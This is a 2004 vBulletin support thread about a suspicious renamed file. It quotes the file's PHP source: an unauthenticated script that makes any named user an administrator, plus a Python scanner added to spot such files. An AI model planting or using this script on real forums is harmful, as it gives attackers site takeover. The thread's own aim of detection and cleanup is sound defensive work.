Bite me?
DJA
Thu 16th Dec '04, 2:34pm
I use vB 2.2.9 (I know I need to upgrade) and I've found a PHP code in my "extras" folder called "biteme.php".
I ran a search in these forums to see if I could find what it does. No luck.
With a name like "biteme", I'm thinking I've been hacked.
Is there a valid PHP code in vB 2.2.9 called "biteme.php"?
MrNase
Thu 16th Dec '04, 2:36pm
You could open that file in any sort of editor to find it out :)
Zachery
Thu 16th Dec '04, 2:41pm
Not that I am aware of.
Steve Machol
Thu 16th Dec '04, 2:45pm
There has never been a file of that name in any vB distribution. I'd be very concerned.
Also please read this important announcement about a security issue with your version of vB:
http://www.vbulletin.com/forum/showthread.php?p=694180#post694180
DJA
Thu 16th Dec '04, 2:47pm
Thanks.
I looked at it in notepad, but I know nothing about PHP. Here's what it looks like:
<html><head><title>vBulletin Administrator Utility</title></head>
<body>
<?php
extract($HTTP_GET_VARS);
if ($username=="") {
echo "<form action=\"getadmin.php\" method=get><p>Username to activate: <input type=text name=username></p>";
echo "<p><input type=submit value=\"Make administrator\"></p>";
} else {
include("global.php");
if ($checkadmin=$DB_site->query_first("SELECT cancontrolpanel FROM usergroup WHERE usergroupid=6")) {
if ($checkadmin[cancontrolpanel]!=1) {
$DB_site->query("UPDATE usergroup SET cancontrolpanel=1 WHERE usergroupid=6");
}
} else {
$DB_site->query("INSERT INTO usergroup VALUES (6,'Administrator','Administrator',1,1,1,1,1,1,1,1,1,1,1)");
}
$DB_site->query("UPDATE user SET usergroupid=6 WHERE username='".addslashes($username)."'");
echo "<p>Administrator reinstated. Please try to access the <a href='admin/index.php'>control panel</a>.</p>";
}
?>
</body>
</html>
What's it mean? Is it supposed to be there? Am I in trouble? It's making me nervous.
Thanks in advance.
Steve Machol
Thu 16th Dec '04, 2:50pm
That is definitely a hack attempt. Remove it immediately. Also check all the Admin and Mod accounts on your forums and make sure they haven't been compromised.
I'd also upgrade to at least 2.3.5 if I were you. Your forums are at risk and you could lose everything. I've seen it happen.
DJA
Thu 16th Dec '04, 2:53pm
Thanks very much Steve. I don't even know how long it's been there.
I don't know much about administering the site either. I've got a lot of reading to do.
Do you mean to use the Admin CP to look at the admin and mod usergroup members?
Kier
Tue 21st Dec '04, 9:00am
Actually, the code in your biteme.php is identical to the code in extras/getadmin.php from the vBulletin 2 distribution. It allows the user to promote any member to admin status and is designed to allow emergency access after something terminal happens to an admin account.
If you didn't put the file there, delete it promptly and try to find out who did put it there.
If you did put it there, it's not the sort of script you want to keep around on a public site; delete it promptly.
You should not upload the extras directory to your webserver unless you have a specific maintenance need for it. Delete that too.
Floris
Tue 21st Dec '04, 9:03am
Can I point out that we never tell users to upload the extras/ folder!
We only want them to upload 1 file from it, in those situations where they need to run it to help restore something when something is broken. And then immediately remove it again.
In version 3 this folder is renamed to 'do_not_upload' to make it even more obvious.
Go find out who is admin on your forum and demote those users again if you didn't manually add them as admin.
And delete the extras/ folder from your web server.
Also please note that various versions smaller than 2.3.5 and 3.0.3 are vulnerable to security issues. I advise to upgrade.
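Kier's observation that the renamed file was identical to a distribution maintenance script, and Floris's advice to keep extras/ (do_not_upload in version 3) off the server, can both be checked by content instead of by file name. The Python sketch below is an added example, not part of the original thread or of vBulletin; its function names and sample tree are constructed for illustration, and it assumes you hold a local, never-uploaded copy of the distribution's maintenance folder to compare against.

```python
import hashlib
import re
import tempfile
from pathlib import Path

MAINTENANCE_DIRS = {"extras", "do_not_upload"}  # folder names from the thread

def fingerprint(data):
    # Hash with whitespace stripped so re-wrapped or CRLF-converted copies still match.
    return hashlib.sha256(re.sub(rb"\s+", b"", data)).hexdigest()

def load_reference(package_dir):
    # fingerprint -> original file name, from a local copy that was never uploaded
    return {fingerprint(p.read_bytes()): p.name
            for p in sorted(Path(package_dir).iterdir()) if p.is_file()}

def scan_webroot(webroot, reference):
    findings = []
    for p in sorted(Path(webroot).rglob("*")):
        rel = p.relative_to(webroot).as_posix()
        if p.is_dir() and p.name.lower() in MAINTENANCE_DIRS:
            findings.append((rel, "maintenance folder on web server"))
        if not p.is_file():
            continue
        original = reference.get(fingerprint(p.read_bytes()))
        if original:
            renamed = "" if p.name == original else ", renamed"
            findings.append((rel, f"copy of {original}{renamed}"))
    return findings

def demo():
    # Constructed sample tree; the tool body is a stand-in, not the real script.
    tool = b"<?php /* constructed stand-in for a maintenance script */ ?>\n"
    files = {"pkg/getadmin.php": tool,
             "web/extras/biteme.php": tool.replace(b"\n", b"\r\n"),
             "web/index.php": b"<?php echo 'forum'; ?>\n"}
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in files.items():
            path = Path(tmp, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(body)
        return scan_webroot(Path(tmp, "web"), load_reference(Path(tmp, "pkg")))

if __name__ == "__main__":
    for path, finding in demo():
        print(f"{path}: {finding}")
```

Any hit is a prompt to delete the file or folder and then review who holds admin rights, as the replies above advise.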
DJA
Tue 21st Dec '04, 1:54pm
Thanks very much for the advice.
My Tech Admin left and I haven't found someone to take his place, so I'm trying to learn as much as I can to upgrade to a newer version.
As far as I know, it was he who installed the Extras folder, since he did the last upgrade to 2.2.9. I don't know why the file was named biteme.php or who put it there.
I'm in the process of reading my host's support area and the vB 3 upgrade info and hope to upgrade by the end of the week. There's a lot to read!
Thanks again for the help. I'll delete that folder right away.